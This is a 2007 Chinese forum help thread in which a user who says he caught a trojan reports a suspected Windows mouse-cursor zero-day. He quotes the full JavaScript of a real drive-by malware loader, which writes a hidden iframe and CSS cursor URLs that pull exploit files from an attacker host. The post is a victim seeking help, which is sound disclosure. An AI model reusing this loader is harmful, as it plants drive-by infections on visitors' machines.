本页主题: windows可能存在鼠标指针0-day漏洞打印 \| 加为IE收藏 \| 复制链接 \| 收藏主题 \| 上一主题 \| 下一主题

破晓大地

级别: 初级会员

精华: 0
发帖: 28
威望: 220 点
风云币: 3507 元
专家分: 0 分
在线时间:1(小时)
注册时间:2007-04-01
最后登录:2007-07-11

小中大引用推荐编辑全看复制

windows可能存在鼠标指针0-day漏洞

windows可能存在鼠标指针0-day漏洞

cisrt博客上的描述:http://www.cisrt.org/blog/read.php?301

以下是利用该漏洞一个恶意地址挂马地址：
http://web.77276.com/adv.js?showmatrix_num=056

代码如下：
//读娶src的对象

var v = document.getElementById("advjs");

//读娶src的参数

var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));

document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");

document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");

document.writeln("<HTML><HEAD>");

document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");

document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");

document.writeln("<BODY> ");

document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao1.jpg\')\">");

document.writeln("<DIV ");

document.writeln("style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao2.jpg\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")

//分析src的参数函数

function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");

if (loU.length>1){

var loallPm = loU[1].split("&");

for (var i=0; i<loallPm.length; i++){

var loPm = loallPm.split("=");

if (loPm[0]==asName){

if (loPm.length>1){

return loPm[1];

}else{

return "";

}

}

}

}

return null;

}

我今天中了个 muxiao2.jpg的木马
可能跟这个有关
所以发表一下
希望高手赐教

http://www.yhlive.com

顶端 Posted: 2007-04-01 11:23 | [楼主]

破晓大地

级别: 初级会员

精华: 0
发帖: 28
威望: 220 点
风云币: 3507 元
专家分: 0 分
在线时间:1(小时)
注册时间:2007-04-01
最后登录:2007-07-11

小中大引用推荐编辑全看复制

知道了下次晓得了

http://www.yhlive.com

顶端 Posted: 2007-04-01 20:40 | 1 楼

	帖子浏览记录版块浏览记录
风云小站 » 『求助专区』